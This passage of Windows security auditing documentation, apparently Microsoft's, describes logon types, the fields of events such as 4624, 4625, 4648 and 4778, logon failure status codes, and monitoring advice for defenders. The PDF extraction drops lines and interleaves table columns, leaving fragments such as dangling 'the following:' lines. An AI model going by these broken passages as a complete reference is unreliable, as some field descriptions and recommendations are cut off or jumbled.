8 NetworkCleartext A user logged on to this

The user's password was
passed to the authentication
package in its unhashed
form. The built-in
authentication packages all
hash credentials before
sending them across the
network. The credentials do
not traverse the network in
plaintext (also called
cleartext).
9 NewCredentials A caller cloned its current

token and specified new
credentials for outbound
connections. The new logon
session has the same local
identity, but uses different
credentials for other network
connections.
10 RemoteInteractive A user logged on to this

computer remotely using
Terminal Services or Remote
Desktop.
11 CachedInteractive A user logged on to this

computer with network
credentials that were stored
locally on the computer. The
domain controller was not
contacted to verify the
credentials.
Restricted Admin Mode [Version 2] [Type = UnicodeString]: Only populated

for RemoteInteractive logon type sessions. This is a Yes/No flag indicating if
the credentials provided were passed using Restricted Admin mode. Restricted
Admin mode was added in Win8.1/2012R2 but this flag was added to the
event in Win10.
Reference: http://blogs.technet.com/b/kfalde/archive/2013/08/14/restricted-
admin-mode-for-rdp-in-windows-8-1-2012-r2.aspx.
If not a RemoteInteractive logon, then this will be "-" string.
Virtual Account [Version 2] [Type = UnicodeString]: a “Yes” or “No” flag,
which indicates if the account is a virtual account (e.g., "Managed Service
Account"), which was introduced in Windows 7 and Windows Server 2008 R2
to provide the ability to identify the account that a given Service uses, instead
of just using "NetworkService".
Elevated Token [Version 2] [Type = UnicodeString]: a “Yes” or “No” flag. If
“Yes” then the session this event represents is elevated and has administrator
privileges.
Impersonation Level [Version 1, 2] [Type = UnicodeString]: can have one of these
four values:
SecurityAnonymous (displayed as empty string): The server process cannot
obtain identification information about the client, and it cannot impersonate
the client. It is defined with no value given, and thus, by ANSI C rules, defaults
to a value of zero.
SecurityIdentification (displayed as "Identification"): The server process can
obtain information about the client, such as security identifiers and privileges,
but it cannot impersonate the client. This is useful for servers that export their
own objects, for example, database products that export tables and views.
Using the retrieved client-security information, the server can make access-
validation decisions without being able to use other services that are using the
client's security context.
SecurityImpersonation (displayed as "Impersonation"): The server process
can impersonate the client's security context on its local system. The server
cannot impersonate the client on remote systems. This is the most common
type.
SecurityDelegation (displayed as "Delegation"): The server process can
impersonate the client's security context on remote systems.
New Logon:
Security ID [Type = SID ]: SID of account for which logon was performed. Event
Viewer automatically tries to resolve SIDs and show the account name. If the SID
Note A security identifier (SID ) is a unique value of variable length used to

identify a trustee (security principal). Each account has a unique SID that is issued
by an authority, such as an Active Directory domain controller, and stored in a
security database. Each time a user logs on, the system retrieves the SID for that
user from the database and places it in the access token for that user. The system
uses the SID in the access token to identify the user in all subsequent interactions
with Windows security. When a SID has been used as the unique identifier for a
user or group, it cannot ever be used again to identify another user or group. For
Account Name [Type = UnicodeString]: the name of the account for which
logon was performed.
Account Domain [Type = UnicodeString]: subject’s domain or computer
name. Formats vary, and include the following:
For some well-known security principals, such as LOCAL SERVICE or
ANONYMOUS LOGON, the value of this field is “NT AUTHORITY”.
For local user accounts, this field will contain the name of the computer
or device that this account belongs to, for example: “Win81”.
Logon ID [Type = HexInt64]: hexadecimal value that can help you correlate
this event with recent events that might contain the same Logon ID, for
example, “4672(S ): Special privileges assigned to new logon.”
Linked Logon ID [Version 2] [Type = HexInt64]: A hexadecimal value of the
paired logon session. If there is no other logon session associated with this
logon session, then the value is “0x0”.
Network Account Name [Version 2] [Type = UnicodeString]: User name that
will be used for outbound (network) connections. Valid only for
NewCredentials logon type.
If not NewCredentials logon, then this will be a "-" string.
Network Account Domain [Version 2] [Type = UnicodeString]: Domain for
the user that will be used for outbound (network) connections. Valid only for
NewCredentials logon type.
If not NewCredentials logon, then this will be a "-" string.
Logon GUID [Type = GUID ]: a GUID that can help you correlate this event
with another event that can contain the same Logon GUID, “4769(S, F ): A
Kerberos service ticket was requested event on a domain controller.
It also can be used for correlation between a 4624 event and several other
events (on the same computer) that can contain the same Logon GUID,
“4648(S ): A logon was attempted using explicit credentials” and “4964(S ):
Special groups have been assigned to a new logon.”
This parameter might not be captured in the event, and in that case appears as
“{00000000-0000-0000-0000-000000000000}”.
Note GUID is an acronym for 'Globally Unique Identifier'. It is a 128-bit integer

number used to identify resources, activities or instances.
Process ID [Type = Pointer]: hexadecimal Process ID of the process that
attempted the logon. Process ID (PID ) is a number used by the operating
system to uniquely identify an active process. To see the PID for a specific
If you convert the hexadecimal value to decimal, you can compare it to the
values in Task Manager.
You can also correlate this process ID with a process ID in other events, for
example, “4688: A new process has been created” Process Information\New
Process ID.
Process Name [Type = UnicodeString]: full path and the name of the
executable for the process.
Workstation Name [Type = UnicodeString]: machine name from which logon
attempt was performed.
Source Network Address [Type = UnicodeString]: IP address of machine
from which logon attempt was performed.
Source Port [Type = UnicodeString]: source port which was used for logon
attempt from remote machine.
Logon Process [Type = UnicodeString]: the name of the trusted logon process
that was used for the logon. See event “4611: A trusted logon process has been
registered with the Local Security Authority” description for more information.
Authentication Package [Type = UnicodeString]: The name of the
authentication package which was used for the logon authentication process.
Default packages loaded on LSA startup are located in
“HKLM\SYSTEM\CurrentControlSet\Control\Lsa\OSConfig” registry key.
Other packages can be loaded at runtime. When a new package is loaded a
“4610: An authentication package has been loaded by the Local Security
Authority” (typically for NTLM ) or “4622: A security package has been loaded
by the Local Security Authority” (typically for Kerberos) event is logged to
indicate that a new package has been loaded along with the package name. The
most common authentication packages are:
Negotiate – the Negotiate security package selects between Kerberos
and NTLM protocols. Negotiate selects Kerberos unless it cannot be
used by one of the systems involved in the authentication or the calling
application did not provide sufficient information to use Kerberos.
Transited Services [Type = UnicodeString] [Kerberos-only]: the list of
transmitted services. Transmitted services are populated if the logon was a
result of a S4U (Service For User) logon process. S4U is a Microsoft extension
to the Kerberos Protocol to allow an application service to obtain a Kerberos
service ticket on behalf of a user – most commonly done by a front-end
website to access an internal resource on behalf of a user. For more
information about S4U, see https://msdn.microsoft.com/library/cc246072.aspx
Package Name (NTLM only) [Type = UnicodeString]: The name of the LAN
Manager sub-package (NTLM -family protocol name) that was used during
logon. Possible values are:
“NTLM V1”
“NTLM V2”
“LM”
Key Length [Type = UInt32]: the length of NTLM Session Security key.
Typically it has 128 bit or 56 bit length. This parameter is always 0 if
“Authentication Package” = “Kerberos”, because it is not applicable for
Kerberos protocol. This field will also have “0” value if Kerberos was negotiated
using Negotiate authentication package.

For 4624(S ): An account was successfully logged on.
High-value accounts: You might have high- Monitor this event with the “New
value domain or local accounts for which you Logon\Security ID” that corresponds to the
need to monitor each action. high-value account or accounts.
administrators, built-in local administrator
account, domain administrators, service
accounts, domain controller accounts and so
on.
Anomalies or malicious actions: You might When you monitor for anomalies or malicious
have specific requirements for detecting actions, use the “New Logon\Security ID”
anomalies or monitoring potential malicious (with other information) to monitor how or
actions. For example, you might need to when a particular account is being used.
monitor for use of an account outside of
working hours.
Non-active accounts: You might have non- Monitor this event with the “New
active, disabled, or guest accounts, or other Logon\Security ID” that corresponds to the
accounts that should never be used. accounts that should never be used.
Account whitelist: You might have a specific If this event corresponds to a “whitelist-only”
whitelist of accounts that are the only ones action, review the “New Logon\Security ID”
allowed to perform actions corresponding to for accounts that are outside the whitelist.
particular events.
Accounts of different types: You might If this event corresponds to an action you
want to ensure that certain actions are want to monitor for certain account types,
performed only by certain account types, for review the “New Logon\Security ID” to see
example, local or domain account, machine or whether the account type is as expected.
user account, vendor or employee account,
and so on.
External accounts: You might be monitoring Monitor this event for the “Subject\Account
accounts from another domain, or “external” Domain” corresponding to accounts from
accounts that are not allowed to perform another domain or “external” accounts.
certain actions (represented by certain specific
events).
Restricted-use computers or devices: You Monitor the target Computer: (or other
might have certain computers, machines, or target device) for actions performed by the
devices on which certain people (accounts) “New Logon\Security ID” that you are
should not typically perform any actions. concerned about.
Account naming conventions: Your Monitor “Subject\Account Name” for

organization might have specific naming names that don’t comply with naming
conventions for account names. conventions.
Because this event is typically triggered by the SYSTEM account, we

recommend that you report it whenever “Subject\Security ID” is not
SYSTEM.
If “Restricted Admin” mode must be used for logons by certain accounts, use
this event to monitor logons by “New Logon\Security ID” in relation to
“Logon Type”=10 and “Restricted Admin Mode”=”Yes”. If “Restricted
Admin Mode”=”No” for these accounts, trigger an alert.
If you need to monitor all logon events for accounts with administrator
privileges, monitor this event with “Elevated Token”=”Yes”.
If you need to monitor all logon events for managed service accounts and
group managed service accounts, monitor for events with “Virtual
Account”=”Yes”.
To monitor for a mismatch between the logon type and the account that uses it
(for example, if Logon Type 4-Batch or 5-Service is used by a member of a
domain administrative group), monitor Logon Type in this event.
If your organization restricts logons in the following ways, you can use this
event to monitor accordingly:
If the user account “New Logon\Security ID” should never be used to
log on from the specific Computer:.
If New Logon\Security ID credentials should not be used from
Workstation Name or Source Network Address.
If a specific account, such as a service account, should only be used from
your internal IP address list (or some other list of IP addresses). In this
case, you can monitor for Network Information\Source Network
Address and compare the network address with your list of IP
addresses.
If a particular version of NTLM is always used in your organization. In
this case, you can use this event to monitor Package Name (NTLM
only), for example, to find events where Package Name (NTLM only)
does not equal NTLM V2.
If NTLM is not used in your organization, or should not be used by a
specific account (New Logon\Security ID ). In this case, monitor for all
events where Authentication Package is NTLM.
If the Authentication Package is NTLM. In this case, monitor for Key
Length not equal to 128, because all Windows operating systems
starting with Windows 2000 support 128-bit Key Length.
If you monitor for potentially malicious software, or software that is not
authorized to request logon actions, monitor this event for Process Name.
If you have a trusted logon processes list, monitor for a Logon Process that is
not from the list.
4625(F): An account failed to log on.
Applies to
Windows 10
Windows Server 2016
Subcategories: Audit Account Lockout and
Audit Logon
Event Description:
This event generates if an account logon
attempt failed when the account was already
locked out. It also generates for a logon
attempt after which the account was locked
out.
It generates on the computer where logon
attempt was made, for example, if logon
attempt was made on user’s workstation,
then event will be logged on this workstation.

event.
Event XML:
- <System>
<Level>0</Level>
<Task>12546</Task>
<Opcode>0</Opcode>
<Correlation />
<Security />
</System>
- <EventData>
<Data Name="FailureReason">%%2307</Data>
<Data Name="SubStatus">0x0</Data>
<Data Name="WorkstationName">DC01</Data>
<Data Name="ProcessId">0x1bc</Data>
<Data Name="ProcessName">C:\\Windows\\System32\\winlogon.exe</Data>
</EventData>
</Event>

Event Versions: 0.
Field Descriptions:
Subject:
Security ID [Type = SID ]: SID of account that reported information about logon failure. Event Viewer
Account Name [Type = UnicodeString]: the name of the account that reported information about logon
failure.
the following:
Logon Type [Type = UInt32]: the type of logon which was performed. “Table 11. Windows Logon Types”
contains the list of possible values for this field.



Control Manager.
8 NetworkCleartext A user logged on to this computer

from the network. The user's password
was passed to the authentication
package in its unhashed form. The
built-in authentication packages all
hash credentials before sending them
across the network. The credentials do
not traverse the network in plaintext
(also called cleartext).

connections.

Remote Desktop.

the credentials.
Table: Windows Logon Types
Account For Which Logon Failed:

Security ID [Type = SID ]: SID of the account that was specified in the logon attempt. Event Viewer
Account Name [Type = UnicodeString]: the name of the account that was specified in the logon attempt.
following:
Failure Information:
Failure Reason [Type = UnicodeString]: textual explanation of Status field value. For this event it typically
has “Account locked out” value.
Status [Type = HexInt32]: the reason why logon failed. For this event it typically has “0xC0000234” value.
The most common status codes are listed in “Table 12. Windows logon status codes.”
0XC000005E There are currently no logon servers available to service the

logon request.
0xC0000064 User logon with misspelled or bad user account
0xC000006A User logon with misspelled or bad password
0XC000006D This is either due to a bad username or authentication

information
0XC000006E Unknown user name or bad password.
0xC000006F User logon outside authorized hours
0xC0000070 User logon from unauthorized workstation
0xC0000071 User logon with expired password
0xC0000072 User logon to account disabled by administrator
0XC00000DC Indicates the Sam Server was in the wrong state to perform
the desired operation.
0XC0000133 Clocks between DC and other computer too far out of sync
0XC000015B The user has not been granted the requested logon type (aka
logon right) at this machine
0XC000018C The logon request failed because the trust relationship

between the primary domain and the trusted domain failed.
0XC0000192 An attempt was made to logon, but the Netlogon service

was not started.
0xC0000193 User logon with expired account
0XC0000224 User is required to change password at next logon
0XC0000225 Evidently a bug in Windows and not a risk
0xC0000234 User logon with account locked
0XC00002EE Failure Reason: An Error occurred during Logon
0XC0000413 Logon Failure: The machine you are logging onto is protected
by an authentication firewall. The specified account is not
allowed to authenticate to the machine.
0x0 Status OK.
Table: Windows logon status codes.

Note To see the meaning of other status\sub-status codes you may also check for status code in the Window
header file ntstatus.h in Windows SDK.
More information: https://dev.windows.com/en-us/downloads
Sub Status [Type = HexInt32]: additional information about logon failure. The most common sub-status
codes listed in the “Table 12. Windows logon status codes.”.
Caller Process ID [Type = Pointer]: hexadecimal Process ID of the process that attempted the logon.
Process ID (PID ) is a number used by the operating system to uniquely identify an active process. To see
the PID for a specific process you can, for example, use Task Manager (Details tab, PID column):
Caller Process Name [Type = UnicodeString]: full path and the name of the executable for the process.
Workstation Name [Type = UnicodeString]: machine name from which logon attempt was performed.
Source Network Address [Type = UnicodeString]: IP address of machine from which logon attempt was
performed.
Source Port [Type = UnicodeString]: source port which was used for logon attempt from remote machine.
Logon Process [Type = UnicodeString]: the name of the trusted logon process that was used for the
logon attempt. See event “4611: A trusted logon process has been registered with the Local Security
Authority” description for more information.
Authentication Package [Type = UnicodeString]: The name of the authentication package which was
used for the logon authentication process. Default packages loaded on LSA startup are located in
“HKLM\SYSTEM\CurrentControlSet\Control\Lsa\OSConfig” registry key. Other packages can be loaded
at runtime. When a new package is loaded a “4610: An authentication package has been loaded by the
Local Security Authority” (typically for NTLM ) or “4622: A security package has been loaded by the Local
Security Authority” (typically for Kerberos) event is logged to indicate that a new package has been loaded
along with the package name. The most common authentication packages are:
Negotiate – the Negotiate security package selects between Kerberos and NTLM protocols.
Negotiate selects Kerberos unless it cannot be used by one of the systems involved in the
authentication or the calling application did not provide sufficient information to use Kerberos.
Transited Services [Type = UnicodeString] [Kerberos-only]: the list of transmitted services. Transmitted
services are populated if the logon was a result of a S4U (Service For User) logon process. S4U is a
Microsoft extension to the Kerberos Protocol to allow an application service to obtain a Kerberos service
ticket on behalf of a user – most commonly done by a front-end website to access an internal resource on
behalf of a user. For more information about S4U, see https://msdn.microsoft.com/library/cc246072.aspx
Package Name (NTLM only) [Type = UnicodeString]: The name of the LAN Manager sub-package
(NTLM -family protocol name) that was used during the logon attempt. Possible values are:
“NTLM V1”
“NTLM V2”
“LM”
Key Length [Type = UInt32]: the length of NTLM Session Security key. Typically it has 128 bit or 56 bit
length. This parameter is always 0 if “Authentication Package” = “Kerberos”, because it is not
applicable for Kerberos protocol. This field will also have “0” value if Kerberos was negotiated using
Negotiate authentication package.

For 4625(F ): An account failed to log on.
events.
If Subject\Account Name is a name of service account or user account, it may be useful to investigate
whether that account is allowed (or expected) to request logon for Account For Which Logon
Failed\Security ID.
To monitor for a mismatch between the logon type and the account that uses it (for example, if Logon
Type 4-Batch or 5-Service is used by a member of a domain administrative group), monitor Logon Type
in this event.
If you have a high-value domain or local account for which you need to monitor every lockout, monitor all
4625 events with the “Subject\Security ID” that corresponds to the account.
We recommend monitoring all 4625 events for local accounts, because these accounts typically should not
be locked out. This is especially relevant for critical servers, administrative workstations, and other high
value assets.
We recommend monitoring all 4625 events for service accounts, because these accounts should not be
locked out or prevented from functioning. This is especially relevant for critical servers, administrative
workstations, and other high value assets.
If your organization restricts logons in the following ways, you can use this event to monitor accordingly:
If the “Account For Which Logon Failed \Security ID” should never be used to log on from the
specific Network Information\Workstation Name.
If a specific account, such as a service account, should only be used from your internal IP address
list (or some other list of IP addresses). In this case, you can monitor for Network
Information\Source Network Address and compare the network address with your list of IP
addresses.
If a particular version of NTLM is always used in your organization. In this case, you can use this
event to monitor Package Name (NTLM only), for example, to find events where Package
Name (NTLM only) does not equal NTLM V2.
If NTLM is not used in your organization, or should not be used by a specific account (New
Logon\Security ID ). In this case, monitor for all events where Authentication Package is NTLM.
If the Authentication Package is NTLM. In this case, monitor for Key Length not equal to 128,
because all Windows operating systems starting with Windows 2000 support 128-bit Key Length.
If Logon Process is not from a trusted logon processes list.
Monitor for all events with the fields and values in the following table:
Failure Information\Status or 0XC000005E – “There are currently no logon servers available

Failure Information\Sub Status to service the logon request.”
Failure Information\Status or 0xC0000064 – “User logon with misspelled or bad user

Failure Information\Sub Status account”.
Especially if you get a number of these in a row, it can be a
sign of user enumeration attack.
Failure Information\Status or 0xC000006A – “User logon with misspelled or bad password”

Failure Information\Sub Status for critical accounts or service accounts.
Failure Information\Status or 0XC000006D – “This is either due to a bad username or

Failure Information\Sub Status authentication information” for critical accounts or service
accounts.
Failure Information\Status or 0xC000006F – “User logon outside authorized hours”.

Failure Information\Status or 0xC0000070 – “User logon from unauthorized workstation”.

Failure Information\Status or 0xC0000072 – “User logon to account disabled by

Failure Information\Sub Status administrator”.
Failure Information\Status or 0XC000015B – “The user has not been granted the requested
Failure Information\Sub Status logon type (aka logon right) at this machine”.
Failure Information\Status or 0XC0000192 – “An attempt was made to logon, but the
Failure Information\Sub Status Netlogon service was not started”.
Failure Information\Status or 0xC0000193 – “User logon with expired account”.

Failure Information\Status or 0XC0000413 – “Logon Failure: The machine you are logging
Failure Information\Sub Status onto is protected by an authentication firewall. The specified
account is not allowed to authenticate to the machine”.
4648(S): A logon was attempted using explicit
credentials.
Applies to
Windows 10
Windows Server 2016
Event Description:
This event is generated when a process
attempts an account logon by explicitly
specifying that account’s credentials.
This most commonly occurs in batch-
type configurations such as scheduled
tasks, or when using the “RUNAS”
command.
It is also a routine event which
periodically occurs during normal
operating system activity.

Security Monitoring
Event XML:
- <System>
<Level>0</Level>
<Task>12544</Task>
<Opcode>0</Opcode>
<Correlation />
<Security />
</System>
- <EventData>
<Data Name="TargetUserName">ladmin</Data>
<Data Name="TargetLogonGuid">{0887F1E4-39EA-D53C-804F-31D568A06274}</Data>
<Data Name="TargetServerName">localhost</Data>
<Data Name="TargetInfo">localhost</Data>
<Data Name="IpAddress">::1</Data>
</EventData>
</Event>

Event Versions: 0.
Field Descriptions:
Subject:
Security ID [Type = SID ]: SID of account that requested the new logon session with explicit credentials. Event
Account Name [Type = UnicodeString]: the name of the account that requested the new logon session
with explicit credentials.
the following:
Logon GUID [Type = GUID ]: a GUID that can help you correlate this event with another event that can
contain the same Logon GUID, “4769(S, F ): A Kerberos service ticket was requested event on a domain
controller.
It also can be used for correlation between a 4648 event and several other events (on the same computer)
that can contain the same Logon GUID, “4624(S ): An account was successfully logged on” and “4964(S ):
0000-000000000000}”.
Account Whose Credentials Were Used:

Account Name [Type = UnicodeString]: the name of the account whose credentials were used.
the following:
controller.
that can contain the same Logon GUID, “4624(S ): An account was successfully logged on” and “4964(S ):
0000-000000000000}”.
Target Server:
Target Server Name [Type = UnicodeString]: the name of the server on which the new process was run.
Has “localhost” value if the process was run locally.
Additional Information [Type = UnicodeString]: there is no detailed information about this field in this
document.
Process ID [Type = Pointer]: hexadecimal Process ID of the process which was run using explicit
credentials. Process ID (PID ) is a number used by the operating system to uniquely identify an active
column):
Network Address [Type = UnicodeString]: IP address of machine from which logon attempt was
performed.
Port [Type = UnicodeString]: source port which was used for logon attempt from remote machine.

For 4648(S ): A logon was attempted using explicit credentials.
The following table is similar to the table in Appendix A: Security monitoring recommendations for many audit
events, but also describes ways of monitoring that use “Account Whose Credentials Were Used\Security ID.”
High-value accounts: You might have high value domain or Monitor this event with the “Subject\Security ID” or
local accounts for which you need to monitor each action. “Account Whose Credentials Were Used\Security ID” that
Examples of high value accounts are database administrators, correspond to the high value account or accounts.
requirements for detecting anomalies or monitoring potential “Subject\Security ID” and “Account Whose Credentials
malicious actions. For example, you might need to monitor for Were Used\Security ID” (with other information) to monitor
use of an account outside of working hours. how or when a particular account is being used.
Non-active accounts: You might have non-active, disabled, Monitor this event with the “Subject\Security ID” or
or guest accounts, or other accounts that should never be “Account Whose Credentials Were Used\Security ID” that
used. correspond to the accounts that should never be used.
accounts that are allowed to perform actions corresponding the “Subject\Security ID” and “Account Whose
to particular events. Credentials Were Used\Security ID” for accounts that are
outside the whitelist.
External accounts: You might be monitoring accounts from Monitor for the “Subject\Account Domain” or “Account
another domain, or “external” accounts that are not allowed Whose Credentials Were Used\Security ID” corresponding
to perform the action corresponding to this event. to accounts from another domain or “external” accounts.
certain computers, machines, or devices on which certain actions performed by the “Subject\Security ID” or “Account
people (accounts) should not typically perform any actions. Whose Credentials Were Used\Security ID” that you are
concerned about.
For example, you might monitor to ensure that “Account
Whose Credentials Were Used\Security ID” is not used to
log on to a certain computer.
Account naming conventions: Your organization might have Monitor “Subject\Account Name” and “Account Whose
specific naming conventions for account names. Credentials Were Used\Security ID” for names that don’t
comply with naming conventions.
If Subject\Security ID should not know or use credentials for Account Whose Credentials Were
Used\Account Name, monitor this event.
If credentials for Account Whose Credentials Were Used\Account Name should not be used from
Network Information\Network Address, monitor this event.
Check that Network Information\Network Address is from internal IP address list. For example, if you
know that a specific account (for example, a service account) should be used only from specific IP
addresses, you can monitor for all events where Network Information\Network Address is not one of
the allowed IP addresses.
4675(S): SIDs were filtered.
Applies to
Windows 10
Windows Server 2016
This event generates when SIDs were filtered for specific Active Directory trust.
See more information about SID filtering here: https://technet.microsoft.com/library/cc772633(v=ws.10).aspx.

Event Schema:
SIDs were filtered.
Target Account:
Security ID:%1
Account Name:%2
Account Domain:%3
Trust Information:
Trust Direction:%4
Trust Attributes:%5
Trust Type:%6
TDO Domain SID:%7
Filtered SIDs:%8

Event Versions: 0.
If you need to monitor all SID filtering events/operations for specific or all Active Directory trusts, you can use
this event to get all required information.
Applies to
Windows 10
Windows Server 2016
Audit Network Policy Server allows you to audit events generated by RADIUS (IAS ) and Network Access
Protection (NAP ) activity related to user access requests. These requests can be Grant, Deny, Discard, Quarantine,
Lock, and Unlock.
If you configure this subcategory, an audit event is generated for each IAS and NAP user access request.
This subcategory generates events only if NAS or IAS role is installed on the server.
NAP events can be used to help understand the overall health of the network.
Event volume: Medium to High on servers that are running Network Policy Server (NPS ).
Role-specific subcategories are outside the scope of this document.
STRONGER STRONGER
Domain IF IF IF IF IF – if a server
Controller has the Network
Policy Server
(NPS) role
installed and you
need to monitor
access requests
and other NPS-
related events,
enable this
subcategory.
Member Server IF IF IF IF IF – if a server

has the Network
Policy Server
(NPS) role
installed and you
need to monitor
access requests
and other NPS-
related events,
enable this
subcategory.
Workstation No No No No Network Policy

Server (NPS) role
cannot be
installed on client
OS.
6272: Network Policy Server granted access to a user.

6273: Network Policy Server denied access to a user.
6274: Network Policy Server discarded the request for a user.
6275: Network Policy Server discarded the accounting request for a
user.
6276: Network Policy Server quarantined a user.
6277: Network Policy Server granted access to a user but put it on
probation because the host did not meet the defined health policy.
6278: Network Policy Server granted full access to a user because the
host met the defined health policy.
6279: Network Policy Server locked the user account due to repeated
failed authentication attempts.
6280: Network Policy Server unlocked the user account.
Applies to
Windows 10
Windows Server 2016
Audit Other Logon/Logoff Events determines whether Windows generates audit events for other logon or logoff
events.
These other logon or logoff events include:
A Remote Desktop session connects or disconnects.
A workstation is locked or unlocked.
A screen saver is invoked or dismissed.
A replay attack is detected. This event indicates that a Kerberos request was received twice with identical
information. This condition could also be caused by network misconfiguration.
A user is granted access to a wireless network. It can be either a user account or the computer account.
A user is granted access to a wired 802.1x network. It can be either a user account or the computer
account.
Logon events are essential to understanding user activity and detecting potential attacks.
Event volume: Low.
STRONGER STRONGER
STRONGER STRONGER

Controller Success auditing,
to track possible
Kerberos replay
attacks, terminal
session connect
and disconnect
actions, network
authentication
events, and some
other events.
Volume of these
events is typically
very low.
Failure events will
show you when
requested
credentials
CredSSP
delegation was
disallowed by
policy. The
volume of these
events is very
low—typically
you will not get
any of these
events.

Success auditing,
to track possible
terminal session
connect and
disconnect
actions, network
authentication
events, and some
other events.
Volume of these
events is typically
very low.
Failure events will
show you when
requested
credentials
CredSSP
delegation was
disallowed by
policy. The
volume of these
events is very
low—typically
you will not get
any of these
events.
STRONGER STRONGER

Success auditing,
to track possible
terminal session
connect and
disconnect
actions, network
authentication
events, and some
other events.
Volume of these
events is typically
very low.
Failure events will
show you when
requested
credentials
CredSSP
delegation was
disallowed by
policy. The
volume of these
events is very
low—typically
you will not get
any of these
events.
Events List:
4649(S ): A replay attack was detected.
4778(S ): A session was reconnected to a Window Station.
4779(S ): A session was disconnected from a Window Station.
4800(S ): The workstation was locked.
4801(S ): The workstation was unlocked.
4802(S ): The screen saver was invoked.
4803(S ): The screen saver was dismissed.
5378(F ): The requested credentials delegation was disallowed by policy.
5632(S ): A request was made to authenticate to a wireless network.
5633(S ): A request was made to authenticate to a wired network.
4649(S): A replay attack was detected.
Applies to
Windows 10
Windows Server 2016
This event generates on domain controllers when KRB_AP_ERR_REPEAT Kerberos response was sent to the
client.
Domain controllers cache information from recently received tickets. If the server name, client name, time, and
microsecond fields from the Authenticator match recently seen entries in the cache, it will return
KRB_AP_ERR_REPEAT. You can read more about this in RFC -1510. One potential cause for this is a misconfigured
network device between the client and server that could send the same packet(s) repeatedly.
Subcategory: Audit Other Logon/Logoff Events
Event Schema:
A replay attack was detected.
Subject:
Security ID:%1
Account Name:%2
Account Domain:%3
Logon ID:%4
Credentials Which Were Replayed:
Account Name:%5
Account Domain:%6
Process ID:%12
Process Name:%13
Workstation Name:%10
Request Type:%7
Logon Process:%8
Authentication Package:%9
Transited Services:%11
This event indicates that a Kerberos replay attack was detected - a request was received twice with identical
information. This condition could be caused by network misconfiguration."
Event Versions: 0.

For 4649(S ): A replay attack was detected.
This event can be a sign of Kerberos replay attack or, among other things, network device configuration or
routing problems. In both cases, we recommend triggering an alert and investigating the reason the event was
generated.
4778(S): A session was reconnected to a Window
Station.
Applies to
Windows 10
Windows Server 2016
Subcategory: Audit Other Logon/Logoff
Events
Event Description:
This event is generated when a user reconnects
to an existing Terminal Services session, or
when a user switches to an existing desktop
using Fast User Switching.
This event also generates when user
reconnects to virtual host Hyper-V Enhanced
Session, for example.

Event XML:
- <System>
<Level>0</Level>
<Task>12551</Task>
<Opcode>0</Opcode>
<Correlation />
<Security />
</System>
- <EventData>
<Data Name="AccountName">ladmin</Data>
<Data Name="AccountDomain">CONTOSO</Data>
<Data Name="LogonID">0x1e01f6</Data>
<Data Name="SessionName">RDP-Tcp\#6</Data>
<Data Name="ClientName">WIN81</Data>
<Data Name="ClientAddress">10.0.0.100</Data>
</EventData>
</Event>

Event Versions: 0.
Field Descriptions:
Subject:
Account Name [Type = UnicodeString]: the name of the account for which the session was reconnected.
the following:
Session:
Session Name [Type = UnicodeString]: the name of the session to which the user was reconnected.
Examples:
RDP -Rcp#N, where N is a number of session – typical RDP session name.
Console – console session, typical for Fast User Switching.
31C5CE94259D4006A9E4#3 – example of “Hyper-V Enhanced Session” session name.
You can see the list of current session’s using “query session” command in command prompt.
Example of output (see SESSIONNAME column):
Client Name [Type = UnicodeString]: computer name from which the user was reconnected. Has
“Unknown” value for console session.
Client Address [Type = UnicodeString]: IP address of the computer from which the user was reconnected.
Has “LOCAL” value for console session.

For 4778(S ): A session was reconnected to a Window Station.
High-value accounts: You might have high-value domain or Monitor this event with the “Subject\Account Name” that
requirements for detecting anomalies or monitoring potential “Subject\Account Name” (with other information) to
malicious actions. For example, you might need to monitor for monitor how or when a particular account is being used.
Non-active accounts: You might have non-active, disabled, Monitor this event with the “Subject\Account Name” that
or guest accounts, or other accounts that should never be corresponds to the accounts that should never be used.
used.
accounts that are the only ones allowed to perform actions the “Subject\Account Name” for accounts that are outside
corresponding to particular events. the whitelist.
certain actions are performed only by certain account types, certain account types, review the “Subject\Account Name”
for example, local or domain account, machine or user to see whether the account type is as expected.
events).
certain computers, machines, or devices on which certain actions performed by the “Subject\Account Name” that you
people (accounts) should not typically perform any actions. are concerned about.
If Fast User Switching is disabled on workstations or specific computers, then monitor for any event with
Session Name = Console.
If Remote Desktop Connections are not allowed for specific users (Subject\Account Name) or disabled on
some computers, then monitor for Session Name = RDP -Tcp# (substring).
If a specific computer or device (Client Name or Client Address) should never connect to this computer
(Computer), monitor for any event with that Client Name or Client Address.
Check that Additional Information\Client Address is from internal IP addresses list.
4779(S): A session was disconnected from a Window
Station.
Applies to
Windows 10
Windows Server 2016
Events
Event Description:
This event is generated when a user
disconnects from an existing Terminal Services
session, or when a user switches away from an
existing desktop using Fast User Switching.
This event also generated when user
disconnects from virtual host Hyper-V
Enhanced Session, for example.

Event XML:
- <System>
<Level>0</Level>
<Task>12551</Task>
<Opcode>0</Opcode>
<Correlation />
<Security />
</System>
- <EventData>
<Data Name="AccountName">ladmin</Data>
<Data Name="AccountDomain">CONTOSO</Data>
<Data Name="LogonID">0x1e01f6</Data>
<Data Name="SessionName">RDP-Tcp\#3</Data>
<Data Name="ClientName">WIN81</Data>
<Data Name="ClientAddress">10.0.0.100</Data>
</EventData>
</Event>

Event Versions: 0.
Field Descriptions:
Subject:
Account Name [Type = UnicodeString]: the name of the account for which the session was disconnected.
the following:
Session:
Session Name [Type = UnicodeString]: the name of disconnected session. Examples:
RDP -Rcp#N, where N is a number of session – typical RDP session name.
Console – console session, typical for Fast User Switching.
31C5CE94259D4006A9E4#3 – example of “Hyper-V Enhanced Session” session name.
You can see the list of current session’s using “query session” command in command prompt.
Example of output (see SESSIONNAME column):
Client Name [Type = UnicodeString]: machine name from which the session was disconnected. Has
“Unknown” value for console session.
Client Address [Type = UnicodeString]: IP address of the computer from which the session was
disconnected.
Has “LOCAL” value for console session.

For 4779(S ): A session was disconnected from a Window Station.
High-value accounts: You might have high-value domain or Monitor this event with the “Subject\Account Name” that
requirements for detecting anomalies or monitoring potential “Subject\Account Name” (with other information) to
malicious actions. For example, you might need to monitor for monitor how or when a particular account is being used.
Non-active accounts: You might have non-active, disabled, Monitor this event with the “Subject\Account Name” that
used.
accounts that are the only ones allowed to perform actions the “Subject\Account Name” for accounts that are outside
corresponding to particular events. the whitelist.
certain actions are performed only by certain account types, certain account types, review the “Subject\Account Name”
for example, local or domain account, machine or user to see whether the account type is as expected.
events).
certain computers, machines, or devices on which certain actions performed by the “Subject\Account Name” that you
people (accounts) should not typically perform any actions. are concerned about.
For example, you might have computers to which connections If you have a target Computer: (or other target device) to
